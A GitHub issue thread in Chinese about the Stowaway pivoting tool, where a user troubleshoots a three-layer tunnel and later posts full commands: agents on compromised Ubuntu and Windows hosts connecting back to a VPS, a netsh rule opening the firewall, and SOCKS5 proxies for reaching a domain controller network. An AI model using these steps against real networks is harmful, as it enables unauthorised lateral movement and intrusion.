### ISSUE TITLE
异常退出

### ISSUE THREAD

**Issue by xiaosage666** [ph4ntonn/Stowaway#27]
在vps 开启服务端: admin -l 9999 -s 123
然后再目标1上运行agent -c vps_ip:9999 -s 123
目标2 运行：agent -l 10000 -s 123  等于在目标2开了一个10000端口
admin,输入use 0 -> connect agent-2的IP:10000来将其加入网络，并成为agent-1的一个子节点
那么目标2 和目标3 网络互通 想在访问目标3的网络 
目标3 运行：agent -l 10000 -s 123  等于在目标3开了一个10000端口
admin,输入use 2 -> connect agent-3的IP:10000来将其加入网络，并成为agent-2的一个子节点
问题怎么自己退出了啊？？？？
还有主动连接的前提是对方防火墙不拦截你 就相当于cs里面的正向bind_tcp监听器把 没有cs里面的反向监听器吗reverse_tcp和管道监听器smb bind_pipe吗

![2](https://user-images.githubusercontent.com/77220702/152988335-7c1ef179-9eea-4319-ae85-0439fc5e0024.png)

**Comment by xiaosage666** [comment]
以为是端口10000冲突了 换10001也不行
往解答什么问题呢
![33](https://user-images.githubusercontent.com/77220702/152990667-cb8ea775-3c5a-4ad9-853a-03b2f243cedc.png)

**Comment by xiaosage666** [comment]
当目标2 connect 目标3:10001 实际查看目标3的端口 发现显示和目标2连接端口通信了 为啥报错
![333](https://user-images.githubusercontent.com/77220702/152991052-8203549a-c4f1-417c-a2d7-783061bcc83a.png)

**Comment by xiaosage666** [comment]
系希望告知三层内网隧道是不是我搭建的思路有问题还是什么原因

**Comment by ph4ntonn** [comment]
按照描述尝试复现无果
首先，第一张图的操作步骤能否详细讲一下？在你的截图里，node1不见了，并且如果你只开了三个子节点的话，编号应当只到node2才对，不可能会有use 2-->再connect的操作
另外，你的93.40的机器是否有防火墙？连接上后就断开的操作应当不是代码实现的问题
被动连接请参考admin的listen命令

**Comment by ph4ntonn** [comment]
如果觉得讲不清楚，方便的话可以加我vx，备注请写git用户名

**Comment by xiaosage666** [comment]
微信多少呢

**Comment by xiaosage666** [comment]
vps执行admin:  ./stowaway_admin -l 9999 -s 123




被控Ubuntu： 192.168.1.20 执行：nohup ./linux_x64_agent -c vps_ip:9999 -s 123 >/dev/null 2>&1 &

此刻我们管理端收到了一个会话

第二层网络代理：
上传agent.exe到目标
在被控机器w7 192.168.1.111上执行：agent.exe -l 10000 -s 123
shell start /b C:\Users\Administrator\Documents\agent.exe -l 10000 -s 123  
shell netstat -ano | findstr 10000  查看目标是否执行成功

(Windows Server 2003 之后系统版本)
允许指定程序连入命令：
netsh advfirewall firewall add rule name="api" dir=in action=allow program="C:\Users\Administrator\Documents\agent.exe"


此时用户可以通过admin,输入use 0 -> connect 192.168.1.111:10000来将其加入网络，并成为agent-1的一个子节点

第二层网络：
socks 7788 成功开启一个socks5端口  我们这样就能访问192.168.93.40了


第三层网络：
选择
use 1-> listen -> 选择1.Normal Passive -> 输入20088 从而使得192.168.93.20开了一个20088端口监听，并等待子节点的连接  等于目标反向tcp连接我们 就是目标192.168.93.40 主动连接我们 192.168.93.20  所以192.168.93.20记得通行这个端口或者关闭防火墙等  在第二层我们已经设置了防火墙通行了 。



在192.168.93.40执行： shell start /b agent.exe -c 192.168.93.20:20088 -s 123


此刻我们管理端 收到了一个新会话


我们输入 socks 7789 就在192.168.93.40 开了一个socks5 端口了 这样我们就能访问域控网络了
